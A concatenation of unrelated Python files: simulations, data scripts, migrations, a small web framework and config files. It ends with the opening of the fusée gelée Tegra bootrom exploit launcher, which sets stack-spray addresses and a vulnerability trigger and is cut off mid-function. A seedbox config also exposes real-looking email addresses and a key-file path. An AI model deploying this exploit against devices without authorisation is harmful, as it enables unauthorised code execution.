pygame.init()
pygame.display.set_caption('Ecossistema Aquático')
# Para o TEMPO
clock = pygame.time.Clock()
seres_objetos = []
# Quantidades de seres na tela
inputs = [0 for i in range(len(utils.seres))]
# Text Inputs
textinputs = [pygame_textinput.TextInput("","",35,True,(255,255,0)) for i in range(len(inputs))]
calorias_input = pygame_textinput.TextInput("","",35,True,(255,255,0))
calorias_perde_input = pygame_textinput.TextInput("","",35,True,(255,255,0))
tempo_perder_calorias_input = pygame_textinput.TextInput("","",35,True,(255,255,0))
tamanho_mapa_quadrados_input = pygame_textinput.TextInput("","",35,True,(255,255,0))
screen = pygame.display.set_mode((utils.w, utils.h))
calorias = utils.single_input_int_com_mensagem(screen,clock,calorias_input, 'Digite quantas calorias você quer por animal na simulação:')
calorias_perde = utils.single_input_int_com_mensagem(screen,clock,calorias_perde_input, 'Digite quantas calorias animal perde/ganha:')
tempo_perder_calorias = utils.single_input_int_com_mensagem(screen,clock,tempo_perder_calorias_input, 'De quantos em quantos segundos perde caloria:')
tamanho_matriz = utils.single_input_int_com_mensagem(screen,clock,tamanho_mapa_quadrados_input, 'Quadrados por linha (tamanho col == linha):')
utils.inicializa_mundo(tamanho_matriz)
#Lê os bicho
for i,textinput in enumerate(textinputs):
inputs[i] = utils.single_input_int_com_mensagem(screen,clock,textinput, 'Número de %s para a execução da simulação:'%(utils.seres_plural[i]))
alga = utils.carrega_sprite('alga_32_32-1.png')
tubarao = utils.carrega_sprite('tubarao_32_32.png')
foca = utils.carrega_sprite('foca_32_32.png')
peixe = utils.carrega_sprite('peixe_32_32.png')
alga = pygame.transform.scale(alga,(utils.tamanho_sprite,utils.tamanho_sprite))
tubarao = pygame.transform.scale(tubarao,(utils.tamanho_sprite,utils.tamanho_sprite))
peixe = pygame.transform.scale(peixe,(utils.tamanho_sprite,utils.tamanho_sprite))
foca = pygame.transform.scale(foca,(utils.tamanho_sprite,utils.tamanho_sprite))
total_seres = 0
for quantidade_seres in inputs:
for j in range(quantidade_seres):
total_seres+=1
if(total_seres > (utils.tamanho_matriz*utils.tamanho_matriz)):
print("-- Tamanho de seres excede o tamanho do tabuleiro! --")
exit()
utils.inicializa_semaforos(total_seres)
ids=0
finalizou = False
for chave,quantidade_seres in enumerate(inputs):
print("Qtd animais " + str(quantidade_seres))
for j in range(quantidade_seres):
# (x, y) = utils.coloca_em_posicao_aleatoria(ids,utils.seres[chave])
(x, y) = utils.coloca_em_posicao_aleatoria(None)
if(utils.seres[chave] == 'alga'):
novo_ser = Alga(ids,alga,alga.get_rect(),utils.tamanho_sprite,utils.tamanho_sprite,x,y)
elif(utils.seres[chave] == 'peixe'):
novo_ser = Peixe(ids,peixe,peixe.get_rect(),utils.tamanho_sprite,utils.tamanho_sprite,x,y,calorias,calorias_perde)
elif(utils.seres[chave] == 'tubarao'):
novo_ser = Tubarao(ids,tubarao,tubarao.get_rect(),utils.tamanho_sprite,utils.tamanho_sprite,x,y,calorias,calorias_perde)
elif(utils.seres[chave] == 'foca'):
novo_ser = Foca(ids,foca,foca.get_rect(),utils.tamanho_sprite,utils.tamanho_sprite,x,y,calorias,calorias_perde)
utils.coloca_em_posicao_especifica(novo_ser)
seres_objetos.append(novo_ser)
# Incrementa os IDS para definir qual será o semáforo da tela (último)
ids+=1
start_time = pygame.time.get_ticks()
tela = Tela(ids, screen, start_time,tempo_perder_calorias)
# Inicialização de threads
for ser in seres_objetos:
ser.start()
tela.start()
# Fechamento de threads
for ser in seres_objetos:
ser.join()
tela.join()
# quit() |
# -*- coding: utf-8 -*-
'''
* Copyright (C) 2015 Music Technology Group - Universitat Pompeu Fabra
*
* This file is part of pypYIN
*
* pypYIN is free software: you can redistribute it and/or modify it under
* the terms of the GNU Affero General Public License as published by the Free
* Software Foundation (FSF), either version 3 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
* details.
*
* You should have received a copy of the Affero GNU General Public License
* version 3 along with this program. If not, see http://www.gnu.org/licenses/
*
* If you have any problem about this python version code, please contact: Rong Gong
* rong.gong@upf.edu
*
* If you have any problem about this algorithm, I suggest you to contact: Matthias Mauch
* m.mauch@qmul.ac.uk who is the original C++ version author of this algorithm
*
* If you want to refer this code, please consider this article:
*
* M. Mauch and S. Dixon,
* “pYIN: A Fundamental Frequency Estimator Using Probabilistic Threshold Distributions”,
* in Proceedings of the IEEE International Conference on Acoustics,
* Speech, and Signal Processing (ICASSP 2014), 2014.
*
* M. Mauch, C. Cannam, R. Bittner, G. Fazekas, J. Salamon, J. Dai, J. Bello and S. Dixon,
* “Computer-aided Melody Note Transcription Using the Tony Software: Accuracy and Efficiency”,
* in Proceedings of the First International Conference on Technologies for
* Music Notation and Representation, 2015.
'''
from scipy.stats import norm
import numpy as np
import matplotlib.pyplot as plt
sigma2Note = 0.7 # note transition probability standard deviation used in pYin
noteDistanceDistr = norm(loc=0, scale=sigma2Note)
fig, ax = plt.subplots(1, 1)
x = np.linspace(norm.ppf(0.01),norm.ppf(0.99), 100)
ax.plot(x, norm.pdf(x),'r-', lw=5, alpha=0.6, label='norm pdf')
ax.legend(loc='best', frameon=False)
plt.title('note transition probability function')
plt.xlabel('note transition distance in semitone')
plt.show()
|
import altair as alt
import pandas as pd
from .visitor import visit
from .aggregate import AGG_REPLACEMENTS
@visit.register(alt.JoinAggregateTransform)
def visit_joinaggregate(
transform: alt.JoinAggregateTransform, df: pd.DataFrame
) -> pd.DataFrame:
transform = transform.to_dict()
groupby = transform.get("groupby")
for aggregate in transform["joinaggregate"]:
op = aggregate["op"]
field = aggregate["field"]
col = aggregate["as"]
op = AGG_REPLACEMENTS.get(op, op)
if field == "*" and field not in df.columns:
field = df.columns[0]
if groupby is None:
df[col] = df[field].aggregate(op)
else:
result = df.groupby(groupby)[field].aggregate(op)
result.name = col
df = df.join(result, on=groupby)
return df
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
from xml.dom import minidom
import os
pathTransDir = '/Users/renyushuang/custom/projectDo/DuScreenRecorder/RecordMaster/src/main/res'
pathTransFile = 'strings.xml'
pathAndroidDir = '/Users/renyushuang/custom/projectDo/VideoDownloader/app/src/main/res'
pathAndroidFile = 'strings.xml'
targetList = ['durec_recorder_noti_start',
'durec_setting_show_touches']
def writeXmlNewString(pathAndroiid, list):
doc = minidom.Document()
root = minidom.parse(pathAndroiid)
docRoot = doc.createElement('resources')
docRoot.setAttribute('xmlns:tools', 'http://schemas.android.com/tools')
docRoot.setAttribute('xmlns:xliff', 'urn:oasis:names:tc:xliff:document:1.2')
doc.appendChild(docRoot)
# 将原有的内容copy一遍
elements = root.getElementsByTagName('string')
for ele in elements:
element = doc.createElement('string')
element.setAttribute("name", ele.attributes['name'].value)
element.appendChild(doc.createTextNode(ele.firstChild.data))
doc.documentElement.appendChild(element)
# 将新增加的内容copy进来
for k, v in list.items():
element = doc.createElement('string')
element.setAttribute("name", k)
element.appendChild(doc.createTextNode(v))
doc.documentElement.appendChild(element)
# 新建的xml进行copy
fp = open(pathAndroiid, 'w')
doc.writexml(fp, indent='', addindent='\t', newl='\n')
def getTransMap(path):
map = {}
root = minidom.parse(path)
elements = root.getElementsByTagName('string')
for ele in elements:
for target in targetList:
if ele.attributes['name'].value == target:
map[ele.attributes['name'].value] = ele.firstChild.data
return map
def main():
transDirList = os.listdir(pathTransDir)
for dir in transDirList:
# 如果不存在的路径那么就跳过
transFilePath = os.path.join(pathTransDir, dir, pathTransFile)
if not os.path.exists(transFilePath):
continue
transMap = getTransMap(transFilePath)
androidResDir = os.path.exists(os.path.join(pathAndroidDir, dir))
if not androidResDir:
continue
# os.mkdir(os.path.join(pathAndroidDir, dir))
if len(transMap) != 0:
androiidResFile = os.path.join(pathAndroidDir, dir, pathAndroidFile)
print(androiidResFile)
if not os.path.exists(androiidResFile):
continue
writeXmlNewString(androiidResFile, transMap)
else:
print('没有匹配的字段')
main()
|
from typing import List, Tuple
import numpy as np
import pandas as pd
import sklearn
from sklearn.ensemble import IsolationForest
from sklearn.preprocessing import StandardScaler
class IsolationForestDetector(object):
def __init__(self):
self._scaler = StandardScaler()
# type: sklearn.preprocessing.StandardScaler
self._forest = IsolationForest(contamination=0.1)
# type: sklearn.preprocessing.IsolationForest
@property
def scaler(self):
return self._scaler
def fit(self, X: np.ndarray):
X_scaled = self._scaler.fit_transform(X)
self._forest.fit(X_scaled)
def predict(self, X: np.array):
X_scaled = self._scaler.transform(X)
return self._forest.predict(X_scaled)
def score(self, X: np.array):
X_scaled = self._scaler.transform(X)
return -self._forest.decision_function(X_scaled)
|
from collections import defaultdict
from itertools import groupby
import sys
from q40 import Morph, arg_int
class Chunk:
"""cabocha lattice formatファイルから文節を読み込む"""
__slots__ = ('idx', 'dst', 'morphs', 'srcs')
# * 0 2D 0/0 -0.764522
def __init__(self, line):
info = line.rstrip().split()
self.idx = int(info[1])
self.dst = int(info[2].rstrip("D"))
self.morphs = []
self.srcs = []
def __str__(self):
return ''.join([morph.surface for morph in self.morphs])
def __repr__(self):
return 'q41.Chunk({}, {})'.format(self.idx, self.dst)
def srcs_append(self, src_idx):
"""係り元文節インデックスを追加"""
self.srcs.append(src_idx)
def morphs_append(self, line):
"""形態素を追加"""
self.morphs.append(Morph(line))
def chunk2str(self):
"""記号を取り除いた文節の表層形を返す"""
return ''.join([morph.surface for morph in self.morphs if morph.pos != '記号'])
def contain_pos(self, pos):
"""文節中にある品詞が存在するかどうかを返す"""
return pos in (morph.pos for morph in self.morphs)
class Sentence:
"""cabocha lattice formatファイルから文を読み込む。Chunkクラスのヘルパー"""
__slots__ = ('chunks', 'idx')
def __init__(self, sent_lines):
self.chunks = []
ch_append = self.chunks.append
for line in sent_lines:
if line.startswith('* '):
ch_append(Chunk(line))
else:
self.chunks[-1].morphs_append(line)
# srcsをappendしたいがためのクラス
for chunk in self.chunks:
if chunk.dst != -1:
self.chunks[chunk.dst].srcs_append(chunk.idx)
def __str__(self):
return ' '.join([morph.surface for chunk in self.chunks for morph in chunk.morphs])
@classmethod
def load_cabocha(cls, fi):
"""cabocha lattice formatファイルからSentenceインスタンスを生成"""
for is_eos, sentence in groupby(fi, key=lambda x: x == 'EOS\n'):
if not is_eos:
yield cls(sentence)
def print_dep_idx(self):
"""係り元文節インデックスと係り先文節インデックスを表示"""
for chunk in self.chunks:
print('{}:{} => {}'.format(chunk.idx, chunk, chunk.dst))
def print_dep(self):
"""係り元文節と係り先文節の表層をタブ区切りで表示"""
for chunk in self.chunks:
if chunk.dst != -1:
print('{}\t{}'.format(chunk.chunk2str(), self.chunks[chunk.dst].chunk2str()))
def dep_edge(self):
"""pydotで係り受けを出力する用"""
return [(chunk.chunk2str(), self.chunks[chunk.dst].chunk2str())
for chunk in self.chunks if chunk.dst != -1]
def print_noun_verb_dep(self):
"""名詞を含む文節が動詞を含む文節に係るものを抽出"""
for chunk in self.chunks:
if chunk.contain_pos('名詞') and self.chunks[chunk.dst].contain_pos('動詞'):
print('{}\t{}'.format(chunk.chunk2str(), self.chunks[chunk.dst].chunk2str()))
def trace_dep_path(self):
"""名詞を含む文節からrootまでの係り受けパスを追跡"""
path = []
ph_append = path.append
for chunk in self.chunks:
if chunk.contain_pos('名詞'):
ph_append(chunk)
d = chunk.dst
while d != -1:
ph_append(self.chunks[d])
d = self.chunks[d].dst
yield path
path.clear()
def main():
sent_id = arg_int()
for i, sent in enumerate(Sentence.load_cabocha(sys.stdin), start=1):
if i == sent_id:
sent.print_dep_idx()
break
if __name__ == '__main__':
main() |
import babelfish
# Local directory settings.
TV_PATH = '/home/siorai/Downloads/Transmission/Organized/TV'
MOVIE_PATH = '/home/siorai/Downloads/Transmission/Organized/Movies'
APP_PATH = '/home/siorai/Downloads/Transmission/Organized/Programs'
MUSIC_PATH = '/home/siorai/Downloads/Transmission/Organized/Music'
OTHER_PATH = '/home/siorai/Downloads/Transmission/Organized/Other'
DEFAULT_PATH = '/home/siorai/Downloads/Transmission/Organized/'
# Log settings.
LOGFILE = 'pyexp.log'
# Extraction settings.
EXTRACTION_FILES_MASK = '770'
EXTRACTION_TEMP_DIR_NAME = '_extracted'
EXTRACTION_EXECUTABLE = '7z'
# Subtitle settings.
SHOULD_FIND_SUBTITLES = True
# A map between each language and its favorite subliminal providers (None for all providers).
LANGUAGES_MAP = {
babelfish.Language('heb'): ['subscenter'],
babelfish.Language('eng'): []
}
# Upload settings.
SHOULD_UPLOAD = False
UPLOAD_TO = 'Google'
ACD_CLI_PATH = '/usr/bin/acd_cli'
DEFAULT_VIDEO_EXTENSION = '.mkv'
SUBTITLES_EXTENSIONS = ['.srt']
LANGUAGE_EXTENSIONS = ['.he', '.en']
# Lists.
EXTENSIONS_WHITE_LIST = ['.srt', '.mkv', '.avi', '.mp4', '.mov', '.m4v', '.wmv']
NAMES_BLACK_LIST = ['sample']
# Remote settings.
# Amazon directory settings.
AMAZON_TV_PATH = '/amazon/tv/path'
AMAZON_MOVIE_PATH = '/amazon/movies/path'
ORIGINAL_NAMES_LOG = '/var/log/original_names.log'
# Google Drive settings.
KEYFILE = '/home/siorai/Python/GoogleDriveFtw!-fc20e0f60d1b.json'
CLIENT_EMAIL = 'seedbox@virtual-plexus-92702.iam.gserviceaccount.com'
DELEGATED_EMAIL = 'paul@ladancesafe.org'
|
"""empty message
Revision ID: 06e2c7d46e81
Revises:
Create Date: 2021-08-29 11:52:21.775818
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '06e2c7d46e81'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('category',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('category_name', sa.String(length=255), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('tag',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('tag_name', sa.String(length=255), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=255), nullable=False),
sa.Column('email', sa.String(length=255), nullable=False),
sa.Column('password', sa.String(length=60), nullable=False),
sa.Column('is_admin', sa.Boolean(), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email'),
sa.UniqueConstraint('username')
)
op.create_table('followers',
sa.Column('follower_id', sa.Integer(), nullable=True),
sa.Column('followed_id', sa.Integer(), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['followed_id'], ['user.id'], ),
sa.ForeignKeyConstraint(['follower_id'], ['user.id'], )
)
op.create_table('post',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('title', sa.String(length=255), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('timestamp', sa.DateTime(), nullable=False),
sa.Column('good_count', sa.Integer(), nullable=False),
sa.Column('category_id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['category_id'], ['category.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('profile',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('image_data', sa.String(length=20), nullable=False),
sa.Column('content', sa.String(length=255), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('comment',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('content', sa.String(length=255), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('post_id', sa.Integer(), nullable=False),
sa.Column('timestamp', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('post_child',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('title', sa.String(length=255), nullable=False),
sa.Column('description', sa.Text(), nullable=False),
sa.Column('image_data', sa.String(length=20), nullable=False),
sa.Column('num', sa.Integer(), nullable=False),
sa.Column('post_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('post_goods',
sa.Column('post_id', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], )
)
op.create_table('post_tags',
sa.Column('post_id', sa.Integer(), nullable=True),
sa.Column('tag_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
sa.ForeignKeyConstraint(['tag_id'], ['tag.id'], )
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('post_tags')
op.drop_table('post_goods')
op.drop_table('post_child')
op.drop_table('comment')
op.drop_table('profile')
op.drop_table('post')
op.drop_table('followers')
op.drop_table('user')
op.drop_table('tag')
op.drop_table('category')
# ### end Alembic commands ###
|
import os
# Cleaning up data files
if os.path.isfile('data1.txt'):
os.remove("data1.txt")
if os.path.isfile('data2.txt'):
os.remove("data2.txt")
if os.path.isfile('data3.txt'):
os.remove("data3.txt")
# finding all the available hosts
cmd = os.popen('bash checkhosts.sh')
print(cmd.read())
cmd.close()
# data sizes
arr = [8192,32768,65536,262144,524288]
l = len(arr)
#P = 8
for i in range(l):
for j in range(10):
string='mpiexec -np 8 -ppn 2 -f hosts ./main.out '+str(arr[i]) + ' 1'
cmd=os.popen(string)
print(cmd.read())
cmd.close()
for i in range(l):
for j in range(10):
string='mpiexec -np 8 -ppn 4 -f hosts ./main.out '+str(arr[i]) + ' 1'
cmd=os.popen(string)
print(cmd.read())
cmd.close()
for i in range(l):
for j in range(10):
string='mpiexec -np 8 -ppn 8 -f hosts ./main.out '+str(arr[i]) + ' 1'
cmd=os.popen(string)
print(cmd.read())
cmd.close()
#P = 16
for i in range(l):
for j in range(10):
string='mpiexec -np 16 -ppn 2 -f hosts ./main.out '+str(arr[i]) + ' 2'
cmd=os.popen(string)
print(cmd.read())
cmd.close()
for i in range(l):
for j in range(10):
string='mpiexec -np 16 -ppn 4 -f hosts ./main.out '+str(arr[i]) + ' 2'
cmd=os.popen(string)
print(cmd.read())
cmd.close()
for i in range(l):
for j in range(10):
string='mpiexec -np 16 -ppn 8 -f hosts ./main.out '+str(arr[i]) + ' 2'
cmd=os.popen(string)
print(cmd.read())
cmd.close()
#P = 32
for i in range(l):
for j in range(10):
string='mpiexec -np 32 -ppn 2 -f hosts ./main.out '+str(arr[i]) + ' 3'
cmd=os.popen(string)
print(cmd.read())
cmd.close()
for i in range(l):
for j in range(10):
string='mpiexec -np 32 -ppn 4 -f hosts ./main.out '+str(arr[i]) + ' 3'
cmd=os.popen(string)
print(cmd.read())
cmd.close()
for i in range(l):
for j in range(10):
string='mpiexec -np 32 -ppn 8 -f hosts ./main.out '+str(arr[i]) + ' 3'
cmd=os.popen(string)
print(cmd.read())
cmd.close()
#uncommnent the below part if matplot lib and all other libs are installed
#os.system('python3 plot.py') |
import time
print('''
-----------------------------------------------------------------------
Project available in the cesarzxk/svg-react-native-converter repository
-----------------------------------------------------------------------
''')
looping = True
while(looping):
name = input('Entre com o nome do arquivo svg: ').strip()
filename = name + '.svg'
destiny = input('Entre com o nome do arquivo de saida com extensão (ex: arquivo.js): ')
imports = []
try:
with open(filename, 'r') as svg:
for i in svg:
try:
index = i.index(' ')
newi = i[1:index].capitalize()
imports.append(newi)
except:
try:
index = i.index('/')
except:
newi = i[1:len(i)-2].capitalize()
imports.append(newi)
if imports[0]=='Svg':
imports.pop(0)
svg.seek(0)
newimports = ''
imports = list(set(imports))
for i in imports:
if (i == imports[len(imports)-1]):
newimports = newimports + i
else:
newimports = newimports + i + ','
with open(destiny, 'w') as destiny:
destiny.write("import React from 'react';\n")
destiny.write("import Svg,{"+newimports+"}from 'react-native-svg';\n")
destiny.write("\n")
destiny.write("export default function "+ name.capitalize() + "(){\n\n")
destiny.write("return(\n")
for i in svg:
if(i[1] == "/"):
newi = i[2:].capitalize()
destiny.write('</'+newi)
else:
newi = i[1:].capitalize()
destiny.write('<'+newi)
destiny.write("\n)}")
print('''
------------------------Sucesso------------------------
<>----------arquivo convertido com sucesso----------</>
-------------------------------------------------------
''')
restart = True
while(restart):
response = input('Deseja continuar convertendo?(n/s): ').lower()
if(response == 'n'):
print('''
|------------------------------------------------------|
|-----------------Thanks for using!:D------------------|
|------------------------------------------------------|
''')
time.sleep(3)
restart = False
looping = False
elif(response == 's'):
restart = False
except:
print('''
-------------------------Erro!-------------------------
<>--------------arquivo não encontrado--------------</>
-------------------------------------------------------
''')
|
'''
1) Copy this file to config.py.
2) Set Wunderground API key here. https://www.wunderground.com/weather/api
'''
WUAPI = '12345abc'
|
from webob import Request, Response, exc
from webob.dec import wsgify
import re
class DictObj:
def __init__(self, d:dict):
if not isinstance(d, dict):
self.__dict__['_dict'] = {}
else:
self.__dict__['_dict'] = d
def __getattr__(self, item):
try:
return self._dict[item]
except KeyError:
raise AttributeError('Attribute {} not fount'.format(item))
def __setattr__(self, key, value):
# 不允许设置属性
raise NotImplementedError
#将dict转换为.形式访问属性
class Context(dict):
def __getattr__(self, item):
try:
return self[item]
except KeyError:
raise AttributeError('Attribute {} not fount'.format(item))
def __setattr__(self, key, value):
self[key] = value
class NestedContext(Context):
def __init__(self, globalcontext: Context=None):
super().__init__()
self.relate(globalcontext)
def relate(self, globalcontext: Context=None):
self.globalcontext = globalcontext
def __getattr__(self, item):
if item in self.keys():
return self[item]
return self.globalcontext[item]
class _Router:
# 各个类型的正则表达式表示
TYPEPATTERNS = {
'str': r'[^/]+', 'word': r'\w+', 'int': r'[-+]?\d+', 'float': r'[-+]?\d+\.\d+', 'any': r'.+'
}
# 对应处理的函数
TYPECAST = {
'str': str, 'word': str, 'int': int, 'float': float, 'any': str
}
KVPATTERN = re.compile(r'/({[^{}:]+:?[^{}:]*})')
def _transform(self, kv: str):
name, _, type = kv.strip('/{}').partition(':')
return '/(?P<{}>{})'.format(name, self.TYPEPATTERNS.get(type, '\w+')), name, self.TYPECAST.get(type, str)
def _parse(self, src: str):
start = 0
res = ''
translator = {}
while True:
matcher = self.KVPATTERN.search(src, start)
if matcher:
res += matcher.string[start:matcher.start()]
tmp = self._transform(matcher.string[matcher.start():matcher.end()])
res += tmp[0]
translator[tmp[1]] = tmp[2]
start = matcher.end()
else:
break
if res:
return res, translator
else:
return src, translator
def __init__(self, prefix: str=''):
self.__prefix = prefix.rstrip('/\\')
self.__routetable = []
#拦截器
self.pre_interceptor = []
self.post_interceptor = []
#上下文
self.ctx = NestedContext()
def register_preinterceptor(self, fn):
self.pre_interceptor.append(fn)
return fn
def register_postinterceptor(self, fn):
self.post_interceptor.append(fn)
return fn
def route(self, rule, *methods):
def wrapper(handler):
pattern, translator= self._parse(rule)
self.__routetable.append((methods, re.compile(pattern), translator, handler))
return handler
return wrapper
def get(self, pattern):
return self.route(pattern, 'GET')
def post(self, pattern):
return self.route(pattern, 'POST')
def head(self, pattern):
return self.route(pattern, 'HEAD')
def match(self, request: Request):
# 前缀处理,prefix是一级的
if not request.path.startswith(self.__prefix):
return None
# 依次拦截请求
for fn in self.pre_interceptor:
request = fn(self.ctx, request)
for methods, pattern, translator, handler in self.__routetable:
if not methods or request.method.upper() in methods:
matcher = pattern.match(request.path.replace(self.__prefix, '', 1))
if matcher:
newdict = {}
for k,v in matcher.groupdict().items():
newdict[k] = translator[k](v)
request.vars = DictObj(newdict)
response = handler(self.ctx, request)
#拦截器
for fn in self.post_interceptor:
response = fn(self.ctx, request, response)
return response
#匹配不上默认返回None
class MagWeb:
# 类属性的方式把类暴露出去
Router = _Router
Request = Request
Response = Response
ctx = Context() #全局上下文对象
def __init__(self, **kwargs):
# 创建上下文对象,共享信息
self.ctx.app = self
for k, v in kwargs:
self.ctx[k] = v
ROUTERS = []
PRE_INTERCEPTOR = []
POST_INTERCEPTOR = []
# 拦截器注册函数
@classmethod
def register_preinterceptor(cls, fn):
cls.PRE_INTERCEPTOR.append(fn)
return fn
@classmethod
def register_postinterceptor(cls, fn):
cls.POST_INTERCEPTOR.append(fn)
return fn
@classmethod
def register(cls, router :_Router):
router.ctx.relate(cls.ctx)
router.ctx.router = router
cls.ROUTERS.append(router)
@wsgify
def __call__(self, request: Request):
#全局拦截请求
for fn in self.PRE_INTERCEPTOR:
request = fn(self.ctx, request)
#遍历ROUTERS, 调用Router实例的match方法,看谁匹配
for router in self.ROUTERS:
response = router.match(request)
for fn in self.POST_INTERCEPTOR:
response = fn(self.ctx, request, response)
if response:
return response
raise exc.HTTPNotFound('Not found')
@classmethod
def extend(cls, name, ext):
cls.ctx[name] = ext
|
import random
class Board(object):
""" Returns a new partially-empty board for 2048.
Contains number 2 generated at random place in the board
"""
__row = 4
__column = 4
def __init__(self):
self.__board = None
def get_new_board(self):
self.__board = [[0 for _ in range(Board.__column)] for _ in range(Board.__row)]
random_row = random.randint(0, Board.__row-1)
random_column = random.randint(0, Board.__column-1)
self.__board[random_row][random_column] = 2
return self.__board
def draw(self):
print "Board: "
for i in range(Board.__row):
for j in range(Board.__column):
print self.__board[i][j],
print
if __name__ == "__main__":
board = Board()
board.get_new_board()
board.draw()
|
# Generated by Django 3.1.2 on 2020-10-19 22:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Startdir',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('root_path', models.CharField(default='.', max_length=255)),
],
),
migrations.CreateModel(
name='File',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('file_type', models.CharField(max_length=18)),
('file_path', models.CharField(max_length=255)),
('relative_to_startdir', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='filesystem.startdir')),
],
),
]
|
#!/usr/bin/env python3
#
# fusée gelée
#
# Launcher for the {re}switched coldboot/bootrom hacks--
# launches payloads above the Horizon
#
# discovery and implementation by @ktemkin
# likely independently discovered by lots of others <3
#
# this code is political -- it stands with those who fight for LGBT rights
# don't like it? suck it up, or find your own damned exploit ^-^
#
# special thanks to:
# ScirèsM, motezazer -- guidance and support
# hedgeberg, andeor -- dumping the Jetson bootROM
# TuxSH -- for IDB notes that were nice to peek at
#
# much love to:
# Aurora Wright, Qyriad, f916253, MassExplosion213, and Levi
#
# greetings to:
# shuffle2
# This file is part of Fusée Launcher
# Copyright (C) 2018 Mikaela Szekely <qyriad@gmail.com>
# Copyright (C) 2018 Kate Temkin <k@ktemkin.com>
# Fusée Launcher is licensed under the terms of the GNU GPLv2
import os
import sys
import errno
import ctypes
import argparse
import platform
import binascii
import struct
USB_XFER_MAX = 0x1000
RCM_V1_HEADER_SIZE = 116
RCM_V35_HEADER_SIZE = 628
RCM_V40_HEADER_SIZE = 644
RCM_V4P_HEADER_SIZE = 680
# The address where the RCM payload is placed.
# This is fixed for most device.
RCM_PAYLOAD_ADDR = 0x4000A000
# The address where the user payload is expected to begin.
PAYLOAD_START_ADDR = 0x4000AE40
# Specify the range of addresses where we should inject our
# payload address.
STACK_SPRAY_START = 0x4000EE40
STACK_SPRAY_END = 0x40011000
class RCMError(Exception):
def __init__(self, rcm_error_code):
msg = "RCM error 0x{:08x}".format(rcm_error_code)
super().__init__(msg)
self.rcm_error_code = rcm_error_code
# notes:
# GET_CONFIGURATION to the DEVICE triggers memcpy from 0x40003982
# GET_INTERFACE to the INTERFACE triggers memcpy from 0x40003984
# GET_STATUS to the ENDPOINT triggers memcpy from <on the stack>
class HaxBackend:
"""
Base class for backends for the TegraRCM vuln.
"""
# USB constants used
STANDARD_REQUEST_DEVICE_TO_HOST_TO_ENDPOINT = 0x82
STANDARD_REQUEST_DEVICE_TO_HOST = 0x80
GET_DESCRIPTOR = 0x6
GET_CONFIGURATION = 0x8
# Interface requests
GET_STATUS = 0x0
# List of OSs this class supports.
SUPPORTED_SYSTEMS = []
def __init__(self, skip_checks=False):
""" Sets up the backend for the given device. """
self.skip_checks = skip_checks
def print_warnings(self):
""" Print any warnings necessary for the given backend. """
pass
def trigger_vulnerability(self, length):
"""
Triggers the actual controlled memcpy.
The actual trigger needs to be executed carefully, as different host OSs
require us to ask for our invalid control request differently.
"""
raise NotImplementedError("Trying to use an abstract backend rather than an instance of the proper subclass!")
@classmethod
def supported(cls, system_override=None):
""" Returns true iff the given backend is supported on this platform. """
# If we have a SYSTEM_OVERRIDE, use it.
if system_override:
system = system_override
else:
system = platform.system()
return system in cls.SUPPORTED_SYSTEMS
@classmethod
def create_appropriate_backend(cls, system_override=None, skip_checks=False):
""" Creates a backend object appropriate for the current OS. """
# Search for a supportive backend, and try to create one.
for subclass in cls.__subclasses__():
if subclass.supported(system_override):
return subclass(skip_checks=skip_checks)
# ... if we couldn't, bail out.
raise IOError("No backend to trigger the vulnerability-- it's likely we don't support your OS!")
def read(self, length):
""" Reads data from the RCM protocol endpoint. """
return bytes(self.dev.read(0x81, length, 3000))
def read_ep0(self, length):
# Triggering the vulnerability is simplest on macOS; we simply issue the control request as-is.
return bytes(self.dev.ctrl_transfer(self.STANDARD_REQUEST_DEVICE_TO_HOST_TO_ENDPOINT, self.GET_STATUS, 0, 0, length))
def write_single_buffer(self, data):
"""
